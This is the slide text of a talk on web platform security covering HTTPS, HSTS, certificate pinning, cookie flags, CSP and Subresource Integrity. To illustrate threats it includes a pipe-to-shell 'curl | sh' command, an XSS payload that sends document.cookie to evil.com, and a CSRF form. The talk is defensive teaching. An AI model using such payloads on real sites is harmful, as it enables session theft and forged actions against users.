Web Platform Security

Transcript

1. Web Platform Security Leveling up Jérémy Courtial Software Security Architect

2. _______ : noun [c]. An application entirely dedicated to execute

   unknown code from unknown origin.

3. _______ : noun [c]. An application entirely dedicated to execute

   unknown code from unknown origin. Rootkit ?

4. _______ : noun [c]. An application entirely dedicated to execute

   unknown code from unknown origin. Malware ?

5. _______ : noun [c]. An application entirely dedicated to execute

   unknown code from unknown origin. Trojan ?

6. _______ : noun [c]. An application entirely dedicated to execute

   unknown code from unknown origin. Browser /ˈbraʊ.zɚ/

7. http://yolo.com Go!

8. curl -s http://yolo.com | sh VS http://yolo.com Go!

9. Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

   execute unknown code from unknown origin.

10. Unknown origin

11. Unknown origin Unsecure

12. What is anyway ? www.google.com

13. What is anyway ? www.oodrive.com

14. What is anyway ? www.lol-cats.com

15. What is anyway ? 172.217.20.46

16. Unsecure origin

17. Unsecure origin

18. Transport Layer Security

19. Confidentiality Integrity Authentication

20. Other incentives "The green lock™"

21. Other incentives HTTP/2

22. Other incentives "Secure origins only" features

23. http https

24. GET /

25. GET / 302 Found Location: https://yolo.com

26. GET / 302 Found Location: https://yolo.com

27. None
28. None

29. 302 Found

30. 302 Found

31. 302 Found

32. HTTP Strict Transport Security

33. Strict-Transport-Security :

34. max-age=31536000; Strict-Transport-Security :

35. includeSubdomains; max-age=31536000; Strict-Transport-Security :

36. http://yolo.com

37. http://yolo.com 307 Internal Redirect

38. https://yolo.com 307 Internal Redirect

39. 307 Internal Redirect GET / https://yolo.com

40. Trust failure

41. TLS certificates are based on trust

42. Oh… trust … That's cute …

43. Trust-based systems don't have a good reliability record …

44. Certificate Authority failures Bad captive portal Every "Internal CA"

45. You've failed me for the last time

46. HTTP Certificate Pinning

47. Public-Key-Pins:

48. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";

49. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";

50. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

51. max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

52. includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

53. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.

54. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.

55. Unknown code

56. XSS <h1>Hello, ${username}</h1>

57. XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"

58. XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>

59. CSRF https://evil.com Click here!

60. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

61. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

62. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

63. Everybody love cookies !

64. Rename Cookie to Spinach ?

65. Rename Cookie to Spinach ? Brussel Sprout ?

66. REJECTED

67. Locking the cookie jar

68. Set-Cookie : JSESSIONID=12345;

69. Set-Cookie : JSESSIONID=12345; secure;

70. Set-Cookie : JSESSIONID=12345; secure; HttpOnly;

71. Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;

72. Content Security Policy

73. Content-Security-Policy

74. : default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src

    … ; connect-src …; Content-Security-Policy

75. : … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy

76. Our data (cookies, assets) are locked. What about third parties

    ?

77. HTML JS JPG

78. CDN HTML JS JPG JS JPG

79. CDN HTML JS JPG JS JPG

80. CDN HTML JS JPG JS JPG

81. CDN HTML JS JPG JS JPG

82. Subresource Integrity

83. <script src="https://example.com/framework.js" > </script>

84. <script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">

85. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser unknown code

86. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser trusted code

87. Many more Suborigins iframe sandboxing Credentials Management

88. https://www.w3.org/2011/webappsec/ @mikewest

89. Times have changed

90. Times have changed "secured" is the new default secured

91. What does secured means ? secured Least Privilege Authentication Integrity

92. Is our platform ? secured

93. Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,

    unlimicon (The Noun Project) and design.google.com/icons/